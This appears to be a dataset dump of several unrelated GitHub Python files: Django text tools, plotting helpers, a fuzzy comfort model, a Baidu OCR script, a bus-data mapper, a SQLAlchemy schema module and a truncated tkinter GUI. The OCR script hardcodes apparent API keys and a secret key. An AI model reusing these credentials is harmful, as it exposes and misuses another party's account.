embeddings = torch.stack(useful_vecs, dim=0).float()\n logging.info('Embedding shapes: {}'.format(str(embeddings.shape)))\n elif embedding_type == 'context':\n return word_vecs\n return embeddings\n","repo_name":"lifengjin/acl_flow","sub_path":"scripts/batcher.py","file_name":"batcher.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"35296528736","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\n\ndef index(request):\n return render(request, 'index.html')\n # return HttpResponse(\"hello

World

\")\n\n\ndef about(request):\n return HttpResponse(\"about page\")\n\n\ndef removeLine(userInput):\n refined_text = \"\"\n for char in userInput:\n if char!= '\\n' and char!='\\r':\n refined_text += char\n return refined_text\n\ndef removePunc(userInput):\n punc = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n refined_text = str()\n for ele in userInput:\n if ele not in punc:\n refined_text = refined_text + ele\n return refined_text\n\ndef removeExtraSpace(userInput):\n tempText = str()\n for x in range(len(userInput)):\n if not (userInput[x] == ' ' and userInput[x+1] == ' '):\n tempText += userInput[x]\n return tempText\n\ndef analyser(request):\n # boxtext = request.GET.get('box','default')\n # check_box = request.GET.get('check','off')\n # capitalise = request.GET.get('capitalise','off')\n # charcounter = request.GET.get('charcounter','off')\n # count = 0\n # if check_box == 'on' and capitalise == 'on':\n # refined_text = str()\n # # punctuation remover\n # punc = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n # for ele in boxtext:\n # if ele not in punc:\n # refined_text = refined_text + ele\n # params = {'boxtext':boxtext, 'refined_text':refined_text, 'capitalised_text': boxtext.upper()}\n # return render(request,'analyser.html',params)\n # if charcounter == 'on':\n # for x in boxtext:\n # count+=1\n # params = {'boxtext':boxtext,'count':count}\n # return render(request,'analyser.html',params)\n # else:\n # return HttpResponse(\"Checkbox not selected\")\n textareaText = request.POST.get('box', 'default')\n # print(textareaTextList)\n # textareaText = str()\n # print(textareaText)\n # for x in textareaTextList:\n # textareaText = textareaText + \"\\n\" + x\n # print(textareaText)\n # print(len(textareaText))\n removePunctuation = request.POST.get('removePunc','off')\n capitalise = request.POST.get('capitalise', 'off')\n lineRemover = request.POST.get('lineRemover', 'off')\n extraSpaceRemover = request.POST.get('extraSpaceRemover', 'off')\n print(lineRemover)\n refinedText = str()\n if removePunctuation == 'on':\n refinedText = removePunc(textareaText)\n if capitalise == 'on':\n refinedText = refinedText.upper()\n if lineRemover == 'on':\n refinedText = removeLine(refinedText)\n if extraSpaceRemover == 'on':\n refinedText = removeExtraSpace(refinedText)\n elif capitalise == 'on':\n refinedText = textareaText.upper()\n if lineRemover == 'on':\n refinedText = removeLine(refinedText)\n if extraSpaceRemover == 'on':\n refinedText = removeExtraSpace(refinedText)\n elif lineRemover == 'on':\n refinedText = removeLine(textareaText)\n print(textareaText.index('\\n'))\n if extraSpaceRemover == 'on':\n refinedText = removeExtraSpace(refinedText)\n elif extraSpaceRemover == 'on':\n refinedText = removeExtraSpace(textareaText)\n else:\n refinedText = textareaText\n\n params = {'''userInput''': textareaText , 'refinedText':refinedText}\n return render(request, 'analyser.html', params)\n\ndef file(request):\n f = open(\"textutils/one.txt\", \"r\")\n return HttpResponse(f.read())\n\ndef charCounter(request):\n return render(request, 'charcounter.html')\n\n\ndef navigator(request):\n return HttpResponse('''\n

My Personal Navigator

\n

Facebook

\n

Instagram

\n

Twitter

\n

Reddit

\n

Telegram

\n ''')","repo_name":"AashishBh/text_analyser_django","sub_path":"textutils/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17896643020","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef contourf(x, y, data, output, color, dpi=300, format='png'):\n\n width = x.max() - x.min()\n height = y.max() - y.min()\n\n fig = plt.figure()\n fig.set_size_inches(width / height, 1)\n ax = plt.Axes(fig, [0, 0, 1, 1])\n ax.set_axis_off()\n fig.add_axes(ax)\n\n plt.xlim(x.min(), x.max())\n plt.ylim(y.min(), y.max())\n\n plt.contourf(x, y, data, levels=color[\"levels\"],\n cmap=color[\"cmap\"], norm=color[\"norm\"])\n\n plt.savefig(output + '.' + format, format=format,\n transparent=True, dpi=dpi)\n\n plt.close(fig)\n\ndef contourfQuiver(x, y, ws, wd, output, step, color, dpi=300, format='png'):\n\n width = x.max() - x.min()\n height = y.max() - y.min()\n\n fig = plt.figure()\n fig.set_size_inches(width / height, 1)\n ax = plt.Axes(fig, [0, 0, 1, 1])\n ax.set_axis_off()\n fig.add_axes(ax)\n\n plt.xlim(x.min(), x.max())\n plt.ylim(y.min(), y.max())\n\n plt.contourf(x, y, ws, levels=color[\"levels\"], cmap=color[\n \"cmap\"], norm=color[\"norm\"])\n\n u = ws * np.cos(wd * np.pi / 180)\n v = ws * np.sin(wd * np.pi / 180)\n\n yy = np.arange(0, y.shape[0], step)\n xx = np.arange(0, x.shape[1], step)\n\n points = np.meshgrid(yy, xx)\n\n plt.quiver(x[points], y[points], u[points], v[points])\n\n plt.savefig(output + '.' + format, format=format,\n transparent=True, dpi=dpi)\n plt.close(fig)\n","repo_name":"ninthdayjt/gridsketch","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29156711247","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nMethod uses Fuzzy Logic to define a comfort value in 0 and 1.\n\n\"\"\"\n\nimport skfuzzy as fuzz\nimport numpy as np \nfrom skfuzzy import control as ctrl\nfrom random import randint,random\nSEED=42\n\n\nclass Fz_Comfort:\n \n '''\n Class applies methods to build a comfort output between 0.1\n \n * Input: temperature and humidity user perception\n \n * Output: Load comfort level\n \n '''\n \n def __init__(self,temp,umidade,graf=0,lang=0):\n \n # Variáveis linguísticas\n self.temp_in = temp \n self.umidade_in = umidade\n if lang==0:\n # Valores das variáveis linguísticas\n self.t = ['muito fria','fria','amena','quente','muito quente'] \n self.u = ['baixa','mediana','alta']\n self.c = ['baixo','médio','alto']\n else: \n self.t = ['very cold','cold','mild','hot','very hot'] \n self.u = ['low','median','high']\n self.c = ['low','medium','high']\n \n \n # Função de início da classe \n self.Vars_Pert()\n self.Rules() \n self.Comput()\n if graf==1:\n self.Grap_result() \n \n def Vars_Pert(self):\n '''\n Method creates the input and output variables for the problem\n and assigns the mapping between the sharp and fuzzy values\n using the membership function\n * Humor : bad, good and great. Scale 0 to 10.\n * Temperature: cold, mild and hot. Scale 0 to 40.\n * Humidity : low, medium and high. Scale 30 to 65.\n * Comfort : low, medium and high. Scale 0 to 10.\n \n The effects of humidity on climate are felt in both temperatures and\n in the rainfall regime. Water, because of its specific heat, tends to conserve\n temperatures for a longer time, causing a smaller variation in them,\n i.e. the thermal amplitude (difference between the highest and lowest temperature)\n is smaller the higher the humidity in the air. Furthermore, in wetter regions\n or that are more affected by humidity, the rainfall regime tends to be higher,\n because the air saturation that causes condensation is more frequent.\n \n high humidity -> low temperature variation\n ''' \n #Entrada e pertinencia - 01\n self.temp = ctrl.Antecedent(np.arange(0, 41, 1), 'temperatura') \n self.temp[self.t[0]] = fuzz.trapmf(self.temp.universe, [0,0,10,18]) \n self.temp[self.t[1]] = fuzz.gaussmf(self.temp.universe, 18,3) \n self.temp[self.t[2]] = fuzz.gaussmf(self.temp.universe, 25,3) \n self.temp[self.t[3]] = fuzz.gaussmf(self.temp.universe, 35,4) \n self.temp[self.t[4]] = fuzz.gaussmf(self.temp.universe, 38,4) \n \n #Entrada e pertinencia - 02\n self.umidade = ctrl.Antecedent(np.arange(35,76,1), 'umidade')\n # self.umidade.automf(names=self.u)\n \n self.umidade[self.u[0]] = fuzz.trapmf(self.umidade.universe, [0,0,40, 50])\n self.umidade[self.u[1]] = fuzz.trimf(self.umidade.universe, [40, 55, 70])\n self.umidade[self.u[2]] = fuzz.trapmf(self.umidade.universe, [60, 70, 75,75])\n \n \n #Saída e pertinencia\n self.conf = ctrl.Consequent(np.arange(0, 1.1, 0.1), 'conforto') \n self.conf[self.c[0]] = fuzz.trapmf(self.conf.universe, [0.0, 0.0, 0.2, 0.4])\n self.conf[self.c[1]] = fuzz.trapmf(self.conf.universe, [0.2, 0.4, 0.6, 0.8])\n self.conf[self.c[2]] = fuzz.trapmf(self.conf.universe, [0.6, 0.8, 1.0, 1.0])\n \n def Rules(self):\n\n \n # *****************************************************************************************\n self.rule4 = ctrl.Rule(\n (self.temp[self.t[0]] | self.temp[self.t[1]]) |\n (self.temp[self.t[2]] & self.umidade[self.u[2]])\n ,self.conf[self.c[0]])\n \n self.rule5 = ctrl.Rule( \n (\n (self.temp[self.t[2]] | self.temp[self.t[3]]) &\n (self.umidade[self.u[0]] |self.umidade[self.u[1]]) )\n ,self.conf[self.c[1]])\n \n self.rule6 = ctrl.Rule(\n # (self.humor[self.h[1]] & \n (self.temp[self.t[4]]) |\n (self.temp[self.t[3]] & self.umidade[self.u[2]])\n ,self.conf[self.c[2]])\n \n \n # *****************************************************************************************\n self.conf_ctrl = ctrl.ControlSystem([\n # self.rule1, self.rule2, self.rule3,\n self.rule4,self.rule5,self.rule6,\n # self.rule7,self.rule8,self.rule9\n ])\n self.conf_simulador = ctrl.ControlSystemSimulation(self.conf_ctrl) \n\n def Comput(self):\n \n self.conf_simulador.input['temperatura'] = self.temp_in\n self.conf_simulador.input['umidade'] = self.umidade_in \n \n self.conf_simulador.compute()\n \n def Grap_result(self):\n #Resultados\n import matplotlib.pyplot as plt\n \n self.temp.view(sim=self.conf_simulador)\n plt.xlabel('Temperature range - \\u03C4 (°C)') \n plt.savefig('results/figures/Fz_temp.png', dpi = 500)\n \n self.umidade.view(sim=self.conf_simulador)\n plt.xlabel('Humidity range - \\u03C5 (%UR)') \n plt.savefig('results/figures/Fz_umid.png', dpi = 500)\n \n self.conf.view(sim=self.conf_simulador)\n plt.xlabel('Comfort level - \\u03C9') \n plt.savefig('results/figures/Fz_conf.png', dpi = 500) \n \n \nclass Fz_sim:\n \n ''' \n Class invokes methods of the Fz Comfort class to set comfort values.\n It uses as input random values of the 3 input variables.\n ''' \n \n def Fuzificar(self,t=None,u=None,h=None,graf=0,imp_texto=0,lang=0): \n np.random.seed(SEED)\n t = [t if t!=None else round(randint(0, 40)+random(),1)][0] \n u = [u if u!=None else round(randint(0, 99)+random(),1)][0] \n\n \n res = Fz_Comfort( temp = t,\n umidade = u,\n graf = graf,\n lang= lang,\n ).conf_simulador.output['conforto'] \n if imp_texto == 1:\n print('Input:\\n\\tThermal perception:',t,\n '| Humidity perception:',u,\n '\\n\\t Assigned comfort:',res,'\\n') \n \n return t,u,np.round(res,2)\n \n# ******************************************\n# Area of tests\n# ******************************************\na=Fz_sim().Fuzificar(30,60,graf=1,imp_texto=1,lang=1)\n# b=Fz_sim().Fuzificar(38,60,graf=1,imp_texto=1,lang=1)\n# Fz_sim().Fuzificar()\n\n","repo_name":"jonathacosta/SmartGrid","sub_path":"SCC-SHC/Codes/Userperception2v/ModConfFz.py","file_name":"ModConfFz.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"12816467732","text":"from aip import AipOcr\n\n\"\"\" 你的 APPID AK SK \"\"\"\nAPP_ID = '11156578'\nAPI_KEY = '3K73kH6H4aGoZbUrE1N0oTO5'\nSECRET_KEY = 'YoL5g6BCnWG4mQvEo0TjyDPozlySdDRp'\n\nclient = AipOcr(APP_ID, API_KEY, SECRET_KEY)\n\n\n\"\"\" 读取图片 \"\"\"\ndef get_file_content(filePath):\n with open(filePath, 'rb') as fp:\n return fp.read()\n\nimage = get_file_content('c:/1.png')\n\"\"\" 调用网络图片文字识别, 图片参数为本地图片 \"\"\"\nclient.webImage(image);\n\n\"\"\" 如果有可选参数 \"\"\"\noptions = {}\noptions[\"detect_direction\"] = \"true\"\noptions[\"detect_language\"] = \"true\"\n\n\"\"\" 带参数调用网络图片文字识别, 图片参数为本地图片 \"\"\"\nresult1 = client.webImage(image, options)\nprint(result1)\nurl = \"https//www.x.com/sample.jpg\"\n\n\"\"\" 调用网络图片文字识别, 图片参数为远程url图片 \"\"\"\nclient.webImageUrl(url);\n\n\"\"\" 如果有可选参数 \"\"\"\noptions = {}\noptions[\"detect_direction\"] = \"true\"\noptions[\"detect_language\"] = \"true\"\n\n\"\"\" 带参数调用网络图片文字识别, 图片参数为远程url图片 \"\"\"\nclient.webImageUrl(url, options)\n\n","repo_name":"boyo116/AI-contentrecognition-imagerecognition","sub_path":"contentrecognize.py","file_name":"contentrecognize.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5737996351","text":"#!/usr/bin/python3\nimport sys\nfrom datetime import datetime\n\noccurence_set = set()\n\ndef join_values(*args) :\n\treturn \".\".join([str(arg) for arg in args])\n\ndef get_timeframe(time):\n\tif 4 * 60 <= time.minute + time.hour * 60 <= 12 * 60 :\n\t\treturn \"morning\"\n\n\tif 12 * 60 + 1 <= time.minute + time.hour * 60 <= 20 * 60 :\n\t\treturn \"afternoon\"\n\n\treturn \"night\"\n\nfor line in sys.stdin:\n\t# remove leading and trailing whitespace\n\tdata = line.strip().split(\",\")\n\ttry :\n\t\ttimestamp = int(data[0])//1000000\n\n\t\t# skip data without line_id\n\t\tline_id = int(data[1])\n\n\t\t# We distinct journey with different direction, hence \n\t\t# variant = direction + variant\n\t\tvariant = data[2] + \"-\" + data[3]\n\t\ttravel_number = int(data[5])\t\n\t\tts_date = datetime.fromtimestamp(timestamp)\n\t\ttimeframe = get_timeframe(ts_date)\n\t\n\t\t# With this, we skip data with null bus stop\n\t\tbus_stop = int(data[13])\n\n\t\toccurence_set_val = join_values(line_id, variant, travel_number, bus_stop)\n\n\t\t# Data is already sorted by timestamp\n\t\t# Original paper uses control point, so we want to simulate bus stops as control points\n\t\t# To do this, we just take the first occurence of data with key :\n\t\t# line_id, variant, travel_number, bus_stop\n\n\t\t# bus_stop means where the bus starts from\n\t\t# so , transition from bus stop 1 -> bus stop 2 means that the bus arrives at bus stop 2\n\t\t# so we take the first occurence of said data to be\n\n\t\t# Additionally, we may have some bus stops without at stops = 1\n\t\t# This is fine, since we can assume that :\n\t\t# 1. We can predict the data from the first timestamp, or\n\t\t# 2. The bus did not stop at said bus stop\n\n\t\t# Format : line_id.variant.travel_number.timestamp\n\t\t# Key : compound line_id.variant(primary).travel_number.timestamp(secondary, sorting)\n\t\t# info : travel_number.timestamp.bus_stop.timeframe\n\t\tif occurence_set_val not in occurence_set :\n\t\t\toccurence_set.add(occurence_set_val)\n\t\t\tkey = join_values(line_id, variant, travel_number, timestamp)\n\t\t\tvalue = join_values(travel_number, timestamp, bus_stop, timeframe)\n\t\t\tprint(\"{}\\t{}\".format(key, value))\n\n\texcept Exception :\n\t\tcontinue\n\n\n\n","repo_name":"AlamHasabie/bus-statistics","sub_path":"mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5060646285","text":"import llog\n\nimport asyncio\nimport threading\nimport logging\nfrom contextlib import contextmanager\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.schema import Index\nfrom sqlalchemy import create_engine, text, event, MetaData, func, Table,\\\n Column, ForeignKey, Integer, String, DateTime, TypeDecorator\nfrom sqlalchemy.exc import ProgrammingError, OperationalError\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy.pool import Pool\nfrom sqlalchemy.types import LargeBinary, Boolean, DateTime\n\nimport consts\nimport mutil\n\nlog = logging.getLogger(__name__)\n\nLATEST_SCHEMA_VERSION = 4\n\nBase = declarative_base()\n\nPeer = None\nDataBlock = None\nNodeState = None\nDmailAddress = None\nDmailKey = None\nDmailMessage = None\nDmailPart = None\nDmailTag = None\n\nclass UtcDateTime(TypeDecorator):\n impl = DateTime\n\n def process_result_value(self, value, dialect):\n return\\\n None if value is None else value.replace(tzinfo=mutil.UTC_TZINFO)\n\ndef _init_daos(Base, d):\n # If I recall correctly, this abomination is purely for PostgreSQL mode,\n # and only for the create schema. It is because while setting the\n # search_path works for all usage, there is the one exception that the\n # create schema code of SQLAlchemy runs before that gets set or something\n # (I think that was it) and the schema won't be created in separate schemas\n # as desired. Hopefully we can get SQLAlchemy fixed and then this\n # complication removed.\n class Peer(Base):\n __tablename__ = \"peer\"\n\n id = Column(Integer, primary_key=True)\n name = Column(String(48), nullable=True)\n\n node_id = Column(LargeBinary, nullable=True)\n pubkey = Column(LargeBinary, nullable=True)\n\n distance = Column(Integer, nullable=True)\n direction = Column(Integer, nullable=True)\n\n address = Column(String, nullable=True)\n\n connected = Column(Boolean, nullable=False)\n\n last_connect_attempt = Column(UtcDateTime, nullable=True)\n\n Index(\"node_id\", Peer.node_id)\n Index(\"distance\", Peer.distance)\n Index(\"connected\", Peer.connected)\n Index(\"connected_distance\", Peer.connected, Peer.distance)\n Index(\"address\", Peer.address)\n\n d.Peer = Peer\n\n class DataBlock(Base):\n __tablename__ = \"datablock\"\n\n id = Column(Integer, primary_key=True)\n data_id = Column(LargeBinary, nullable=False)\n distance = Column(LargeBinary, nullable=False)\n original_size = Column(Integer, nullable=False)\n insert_timestamp = Column(UtcDateTime, nullable=False)\n last_access = Column(UtcDateTime, nullable=True)\n version = Column(String, nullable=True) # str for sqlite bigint :(.\n signature = Column(LargeBinary, nullable=True)\n epubkey = Column(LargeBinary, nullable=True)\n pubkeylen = Column(Integer, nullable=True)\n target_key = Column(LargeBinary, nullable=True)\n\n Index(\"data_id\", DataBlock.data_id)\n Index(\"datablock__distance\", DataBlock.distance.desc())\n\n d.DataBlock = DataBlock\n\n class NodeState(Base):\n __tablename__ = \"nodestate\"\n\n key = Column(String(64), primary_key=True)\n value = Column(String(128), nullable=True)\n\n d.NodeState = NodeState\n\n class DmailKey(Base):\n __tablename__ = \"dmailkey\"\n\n id = Column(Integer, primary_key=True)\n parent_id = Column(Integer, ForeignKey(\"dmailaddress.id\"))\n x = Column(LargeBinary, nullable=False)\n target_key = Column(LargeBinary, nullable=False)\n difficulty = Column(Integer, nullable=False)\n\n d.DmailKey = DmailKey\n\n class DmailAddress(Base):\n __tablename__ = \"dmailaddress\"\n\n id = Column(Integer, primary_key=True)\n site_key = Column(LargeBinary, nullable=False)\n site_privatekey = Column(LargeBinary, nullable=True)\n scan_interval = Column(Integer, nullable=True)\n keys = relationship(DmailKey)\n messages = relationship(\"DmailMessage\")\n\n Index(\"dmailaddress__site_key\", DmailAddress.site_key)\n\n d.DmailAddress = DmailAddress\n\n dmail_message__dmail_tag = Table(\\\n \"dmail_message__dmail_tag\",\\\n Base.metadata,\\\n Column(\"dmail_message_id\", Integer, ForeignKey(\"dmailmessage.id\")),\\\n Column(\"tag_id\", Integer, ForeignKey(\"dmailtag.id\")))\n\n class DmailTag(Base):\n __tablename__ = \"dmailtag\"\n\n id = Column(Integer, primary_key=True)\n name = Column(String, nullable=False)\n\n Index(\"dmailtag__name\", DmailTag.name)\n\n d.DmailTag = DmailTag\n\n class DmailPart(Base):\n __tablename__ = \"dmailpart\"\n\n id = Column(Integer, primary_key=True)\n dmail_message_id = Column(Integer, ForeignKey(\"dmailmessage.id\"))\n mime_type = Column(String, nullable=True)\n data = Column(LargeBinary, nullable=False)\n\n d.DmailPart = DmailPart\n\n class DmailMessage(Base):\n __tablename__ = \"dmailmessage\"\n\n id = Column(Integer, primary_key=True)\n dmail_address_id = Column(Integer, ForeignKey(\"dmailaddress.id\"))\n dmail_key_id = Column(Integer, nullable=True)\n data_key = Column(LargeBinary, nullable=False)\n sender_dmail_key = Column(LargeBinary, nullable=True)\n sender_valid = Column(Boolean, nullable=True)\n destination_dmail_key = Column(LargeBinary, nullable=True)\n destination_significant_bits = Column(Integer, nullable=True)\n subject = Column(String, nullable=False)\n date = Column(UtcDateTime, nullable=False)\n read = Column(Boolean, nullable=False)\n hidden = Column(Boolean, nullable=False)\n deleted = Column(Boolean, nullable=False)\n tags = relationship(DmailTag, secondary=dmail_message__dmail_tag)\n address = relationship(DmailAddress)\n parts = relationship(DmailPart, cascade=\"all, delete-orphan\")\n\n Index(\"dmailmessage__data_key\", DmailMessage.data_key)\n\n d.DmailMessage = DmailMessage\n\n return d\n\nclass Db():\n def __init__(self, loop, url, schema=None):\n self.loop = loop\n self.url = url\n self.Session = None\n\n self.engine = None\n\n self.schema = schema\n\n self.is_sqlite = False\n self.sqlite_lock = None\n\n self.pool_size = 10\n\n @property\n def schema(self):\n return self._schema\n\n @schema.setter\n def schema(self, value):\n self._schema = value\n self._schema_setcmd = \"set search_path={}\".format(self._schema)\n\n @contextmanager\n def open_session(self, read_only=False):\n read_only = False; #TODO: Need to implement a read-write lock.\n\n if self.sqlite_lock and not read_only:\n self.sqlite_lock.acquire()\n\n try:\n session = self.Session()\n try:\n yield session\n finally:\n try:\n session.close()\n except TypeError:\n log.exception(\"SqlAlchemy crashed; workaround engaged;\"\\\n \" Session leaked! Upgrade to 1.0.8 to prevent this!\")\n except Exception:\n log.exception(\"Db session contextmanager.\")\n raise\n finally:\n if self.sqlite_lock and not read_only:\n self.sqlite_lock.release()\n\n def lock_table(self, sess, tableobj):\n if self.sqlite_lock:\n return\n\n st = \"LOCK \\\"{}\\\" IN SHARE ROW EXCLUSIVE MODE\"\\\n .format(tableobj.__table__.name)\n sess.execute(st)\n\n def init_engine(self):\n self.is_sqlite = self.url.startswith(\"sqlite:\")\n\n log.info(\"Creating engine.\")\n if self.is_sqlite:\n self.engine = create_engine(self.url, echo=False)\n else:\n self.engine = create_engine(\\\n self.url, echo=False,\n pool_size=self.pool_size, max_overflow=0)\n\n log.info(\"Configuring engine...\")\n if self.is_sqlite:\n self.sqlite_lock = threading.Lock()\n\n # The following KLUDGE is from SqlAlchemy docs. SqlAlchemy says the\n # pysqlite drivers is broken and decides to 'help' by not honoring\n # your transaction begin statement and to also auto commit even\n # though you told it not to.\n @event.listens_for(self.engine, \"connect\")\n def do_connect(dbapi_connection, connection_record):\n # Disable pysqlite's emitting of the BEGIN statement entirely.\n # Also stops it from emitting COMMIT before any DDL.\n dbapi_connection.isolation_level = None\n\n @event.listens_for(self.engine, \"begin\")\n def do_begin(conn):\n # Emit our own BEGIN.\n conn.execute(\"BEGIN\")\n else:\n if self.schema:\n event.listen(\\\n self.engine.pool, \"connect\", self._set_search_path)\n\n self.Session = sessionmaker(bind=self.engine)\n\n def _set_search_path(self, conn, proxy):\n if log.isEnabledFor(logging.INFO):\n log.info(\"Setting search path [{}].\".format(self.schema))\n conn.cursor().execute(self._schema_setcmd)\n conn.commit()\n\n @asyncio.coroutine\n def ensure_schema(self):\n yield from self.loop.run_in_executor(None, self._ensure_schema)\n\n def _ensure_schema(self):\n log.info(\"Checking schema.\")\n\n new_db = False\n\n with self.open_session(True) as sess:\n q = sess.query(NodeState)\\\n .filter(NodeState.key == consts.NSK_SCHEMA_VERSION)\n\n try:\n r = q.first()\n except OperationalError:\n new_db = True\n\n if new_db:\n log.info(\"Database schema is missing, creating.\")\n self._create_schema()\n\n with self.open_session() as sess:\n ns = NodeState()\n ns.key = consts.NSK_SCHEMA_VERSION\n ns.value = str(LATEST_SCHEMA_VERSION)\n sess.add(ns)\n sess.commit()\n return\n\n if r:\n version = int(r.value)\n else:\n # This is the schema before we started tracking version in db.\n version = 1\n\n if log.isEnabledFor(logging.INFO):\n log.info(\"Existing schema detected (version=[{}]).\".format(version))\n\n # Perform necessary upgrades.\n if version == 1:\n if _test_and_fix_if_really_4(self):\n version = 4\n else:\n _upgrade_1_to_2(self)\n version = 2\n\n if version == 2:\n _upgrade_2_to_3(self)\n version = 3\n\n if version == 3:\n _upgrade_3_to_4(self)\n version = LATEST_SCHEMA_VERSION\n\n def _create_schema(self):\n log.info(\"Creating schema.\")\n\n if self._schema:\n tmp_Base = declarative_base()\n d = _init_daos(tmp_Base, DObject())\n for t in tmp_Base.metadata.tables.values():\n t.schema = self.schema\n\n try:\n tmp_Base.metadata.create_all(self.engine)\n except ProgrammingError:\n with self.open_session() as sess:\n st = \"CREATE SCHEMA {}\".format(self.schema)\n sess.execute(st)\n sess.commit()\n\n tmp_Base.metadata.create_all(self.engine)\n else:\n Base.metadata.create_all(self.engine)\n\nclass DObject(object):\n pass\n\nif Peer is None:\n d = _init_daos(Base, DObject())\n\n Peer = d.Peer\n DataBlock = d.DataBlock\n NodeState = d.NodeState\n\n # Maalstroom Dmail Client.\n DmailAddress = d.DmailAddress\n DmailKey = d.DmailKey\n DmailMessage = d.DmailMessage\n DmailPart = d.DmailPart\n DmailTag = d.DmailTag\n\ndef _update_node_state(sess, version):\n \"Caller must call commit.\"\n\n q = sess.query(NodeState)\\\n .filter(NodeState.key == consts.NSK_SCHEMA_VERSION)\n\n ns = q.first()\n\n if not ns:\n ns = NodeState()\n ns.key = consts.NSK_SCHEMA_VERSION\n sess.add(ns)\n\n ns.value = str(version)\n\ndef _test_and_fix_if_really_4(db):\n with db.open_session() as sess:\n q = sess.query(DmailMessage)\\\n .filter(DmailMessage.deleted == False)\n\n try:\n test = q.all()\n\n _update_node_state(sess, 4)\n\n sess.commit()\n\n is_4 = True\n except Exception:\n is_4 = False\n\n return is_4\n\ndef _upgrade_1_to_2(db):\n log.warning(\"NOTE: Upgrading database schema from version 1 to 2.\")\n\n t_bytea = \"BLOB\" if db.is_sqlite else \"bytea\"\n t_integer = \"INTEGER\" if db.is_sqlite else \"integer\"\n\n with db.open_session() as sess:\n st = \"ALTER TABLE dmailmessage ADD COLUMN destination_dmail_key \"\\\n + t_bytea\n\n sess.execute(st)\n\n st = \"ALTER TABLE dmailmessage ADD COLUMN\"\\\n \" destination_significant_bits \"\\\n + t_integer\n\n sess.execute(st)\n\n _update_node_state(sess, 2)\n\n sess.commit()\n\n log.warning(\"NOTE: Database schema upgraded.\")\n\ndef _upgrade_2_to_3(db):\n log.warning(\"NOTE: Upgrading database schema from version 2 to 3.\")\n\n t_integer = \"INTEGER\" if db.is_sqlite else \"integer\"\n\n with db.open_session() as sess:\n st = \"ALTER TABLE dmailaddress ADD COLUMN scan_interval \"\\\n + t_integer\n\n sess.execute(st)\n\n _update_node_state(sess, 3)\n\n sess.commit()\n\n log.warning(\"NOTE: Database schema upgraded.\")\n\ndef _upgrade_3_to_4(db):\n log.warning(\"NOTE: Upgrading database schema from version 3 to 4.\")\n\n t_integer = \"INTEGER\" if db.is_sqlite else \"integer\"\n\n with db.open_session() as sess:\n st = \"ALTER TABLE dmailmessage ADD COLUMN dmail_key_id \"\\\n + t_integer\n\n sess.execute(st)\n\n default = \"0\" if db.is_sqlite else \"false\"\n\n st = \"ALTER TABLE dmailmessage ADD COLUMN deleted BOOLEAN not null\"\\\n + \" default \" + default\n\n sess.execute(st)\n\n _update_node_state(sess, 4)\n\n sess.commit()\n\n log.warning(\"NOTE: Database schema upgraded.\")\n","repo_name":"bitcoinembassy/morphis","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":14144,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"31195362807","text":"#!/usr/bin/python3\n\"\"\"\nhttps://docs.python.org/3/library/tkinter.html\nhttps://likegeeks.com/python-gui-examples-tkinter-tutorial/\n\"\"\"\nimport tkinter as tk\nimport tkinter.scrolledtext\n\nSTARTING_PAIRS_TUPLE = (\"(0, 1) - Trivial\", \"(13/84, 55/84) - Bourgain\", \"(9/56, 37/56) - Bombieri and Iwaniec\", \"(89/560, 369/560) - Watt\")\n\n\n\n\n#################################################\n# Methods\n#################################################\ndef searchPairs():\n \"\"\"\n thetaInput is defined below as the ScrolledText where the user types the theta functions\n \"\"\"\n thetaInputContents = thetaInput.get(\"1.0\", tk.END)\n print(thetaInputContents)\n\n\n#################################################\n# Script start\n#################################################\n#setup the window\nwindow = tk.Tk()\nwindow.title(\"pairsearch: Exponent pair searcher\")\nwindow.geometry(\"600x500\")\n\n#add the instructions and the textbox\ninstructionLabel = tk.Label(window, text=\"Minimize the maximum of\\nthe following theta functions:\", font=(\"Arial\", 12), justify=tk.LEFT)\ninstructionLabel.grid(row=0, column=0, sticky=tk.W)\nthetaInput = tkinter.scrolledtext.ScrolledText(window, height=10, width=20, font=(\"consolas\", 12)) \nthetaInput.grid(row=1, column=0)\n\n#add the descriptive label\nthetaText = \"Each line in the box\\ncorresponds to a \\u03b8 function\\n\\n\\u03b8(k,l) = (ak + bl + c)/(dk + el + f)\\ncorresponds to the line\\na,b,c,d,e,f\"\nthetaLabel = tk.Label(window, text=thetaText, font=(\"Arial\", 12), justify=tk.LEFT)\nthetaLabel.grid(row=0, column=1, rowspan=2, columnspan=2)\n\n#add the number of operations label/spinner\nprocessCountFrame = tk.Frame(window)\nprocessCountFrame.grid(row=3, column=0, columnspan=2, sticky=tk.W)\nprocessCountLabel = tk.Label(processCountFrame, text=\"Max number of A/B steps: \", font=(\"Arial\", 12), justify=tk.LEFT)\nprocessCountLabel.grid(row=0, column=0)\nprocessCountSpinner = tk.Spinbox(processCountFrame, from_=1, to_=100, width=3)\nprocessCountSpinner.grid(row=0, column=1)\n#PIZZA - default to 5\n\n#select starting pair from dropdown?\nstartPairFrame = tk.Frame(window)\nstartPairFrame.grid(row=4, column=0, columnspan=2, sticky=tk.W)\nstartPairLabel = tk.Label(startPairFrame, text=\"Starting pair: \", 